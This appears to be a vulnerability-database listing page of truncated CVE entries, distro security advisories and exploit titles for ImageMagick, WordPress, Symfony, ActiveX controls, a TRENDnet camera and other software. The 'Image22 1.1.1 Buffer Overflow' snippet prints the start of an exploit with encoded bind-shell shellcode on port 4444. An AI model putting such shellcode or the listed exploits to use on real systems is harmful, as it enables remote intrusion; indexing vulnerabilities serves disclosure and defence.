PT-2026-21633

Name of the Vulnerable Software and Affected Versions ImageMagick versions prior to 7.1.2-15 ImageMagick versions prior to 6.9.13-40 Description ImageMagick is software used for editing and manipulating digital images. Prior to versions 7.1.2-15 and 6.9.13-40, a specially crafted MSL script can...

CVE-2025-69066 WordPress Indoor Plants theme <= 1.2.7 - Local File Inclusion vulnerability

Improper Control of Filename for Include/Require Statement in PHP Program 'PHP Remote File Inclusion' vulnerability in AncoraThemes Indoor Plants indoor-plants allows PHP Local File Inclusion.This issue affects Indoor Plants: from n/a through = 1.2.7...

Photon OS 5.0: Netkit PHSA-2025-5.0-0666

An update of the netkit package has been released. %NASLMINLEVEL 80900 C Tenable, Inc. The descriptive text and package checks in this plugin were extracted from VMware Security Advisory PHSA-2025-5.0-0666. The text itself is copyright C VMware, Inc. include'compat.inc'; if description...

Detect It Easy - Program For Determining Types Of Files For Windows, Linux And MacOS

Detect It Easy, or abbreviated "DIE" is a program for determining types of files. "DIE" is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS. Many programs of the kind PEID, PE tools allow to use third-party signatures. Unfortunately,...

DEBIAN-CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

UBUNTU-CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

[SECURITY] Fedora 21 Update: mailx-12.5-14.fc21

Mailx is an enhanced mail command, which provides the functionality of the POSIX mailx command, as well as SysV mail and Berkeley Mail from which it is derived. Additionally to the POSIX features, mailx can work with Maildir/ e-mail storage format as well as mailboxes, supports IMAP, POP3 and SMT...

TRENDnet SecurView Wireless Network Camera TV-IP422WN - &#039;UltraCamX.ocx&#039; Stack Buffer Overflow (PoC)

TRENDnet SecurView Wireless Network Camera TV-IP422WN UltraCamX.ocx Stack BoF Vendor: TRENDnet Product web page: http://www.trendnet.com Affected version: TV-IP422WN/TV-IP422W Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful dual-codec wireless network camera with the...

[SECURITY] [DSA 3064-1] php5 security update

------------------------------------------------------------------------- Debian Security Advisory DSA-3064-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso November 04, 2014 http://www.debian.org/security/faq -...

Mcafee FreeScan CoMcFreeScan Browser Information Disclosure Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10077/info Reportedly the Mcafee FreeScan 'McFreeScan.CoMcFreeScan.1' COM object is prone to a remote information disclosure vulnerability. This issue is due to a failure of the object to properly validate information...

PHP SSL Module &quot;subjectAltNames&quot;空字节处理安全绕过漏洞

Bugtraq ID:61776 PHP是一种HTML内嵌式的脚本语言 PHP SSL模块不正确处理服务器SSL证书中"subjectAltNames"通用名中的空字节，允许攻击者利用漏洞进行中间人攻击，获取敏感信息 0 PHP 5.3.27 PHP 5.4.17 PHP 5.5.1 厂商解决方案 用户可参考如下厂商提供的安全补丁以修复该漏洞： http://git.php.net/?p=php-src.git;a=commit;h=dcea4ec698dcae39b7bba6f6aa08933cbfee6755...

KingView 6.5.3 SCADA - ActiveX

KingView 6.5.3 SCADA - ActiveX Exploit Title: KingView 6.5.3 SCADA ActiveX Date: March 07 2011 Author: Carlos Mario Penagos Hollmann Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53EN.rar Version: 6.53 English Tested on: Windows xp sp3 running on VMwa...

Qtweb Browser v3.5 Buffer Overflow Vulnerability

Exploit for linux platform in category dos / poc ================================================ Qtweb Browser v3.5 Buffer Overflow Vulnerability ================================================ Title: Remote Buffer Overflow Qtweb Browser 3.5 Software:http://www.qtweb.net/downloads/QtWeb-setup.e...

Image22 1.1.1 Buffer Overflow

' 988 bytes for shellcode ' bind shell port 4444 sc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" & unescape"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41" &...

MW6 Barcode ActiveX控件远程缓冲区溢出漏洞

MW6 Barcode ActiveX是用于创建一维条码的工具。 MW6 Barcode ActiveX的实现上存在缓冲溢出漏洞，远程攻击者可能利用此漏洞控制用户客户端系统。 Barcode.MW6Barcode.1 ActiveX控件Barcode.dll在处理超长的Supplement参数数据时存在堆溢出问题，远程恶意网站可以通过包含超长参数的网页ActiveX调用在用户客户端系统上执行任意指令。 MW6 Technologies Barcode ActiveX 3.x 厂商补丁： MW6 Technologies ----------------...

Chilkat XML ActiveX Remote Arbitrary File Creation/Execution Exploit

Exploit for unknown platform in category remote exploits ==================================================================== Chilkat XML ActiveX Remote Arbitrary File Creation/Execution Exploit ====================================================================...

Ruby WEBrick远程目录遍历漏洞

CVECAN ID: CVE-2008-1891 Ruby是一种功能强大的面向对象的脚本语言。 WEBrick是Ruby中内嵌的HTTP服务器程序库。WEBrick组件存在目录遍历漏洞，如果服务器使用的是NTFS或FAT文件系统的话，远程攻击者就可以通过在向使用WEBrick::HTTPServlet::FileHandler或WEBrick::HTTPServer.new的应用所提交的URI请求结尾附加“+”、“%2b”、“.”、“%2e”或“%20”字符执行目录遍历攻击，导致读取任意CGI文件。 Yukihiro Matsumoto Ruby 1.9.x Yukihiro...

PHP import_request_variables&#40;&#41; arbitrary variable overwrite

PHP importrequestvariables arbitrary variable overwrite Name Using importrequestvariables you can overwrite $ and $ any php variable. Systems Affected PHP =4.0.7 =5.2.1 Severity High Vendor http://www.php.net/ Advisory http://www.wisec.it/vulns.php?id=10 http://www.wisec.it/vuln10.txt Authors...

Apache 1.3 + PHP 3 - File Disclosure

Apache 1.3 + PHP 3 - File Disclosure source: https://www.securityfocus.com/bid/2060/info Apache Web Server is subject to disclose files to unauthorized users when used in conjunction with the PHP3 script language. By requesting a specially crafted URL by way of php, it is possible for a remote us...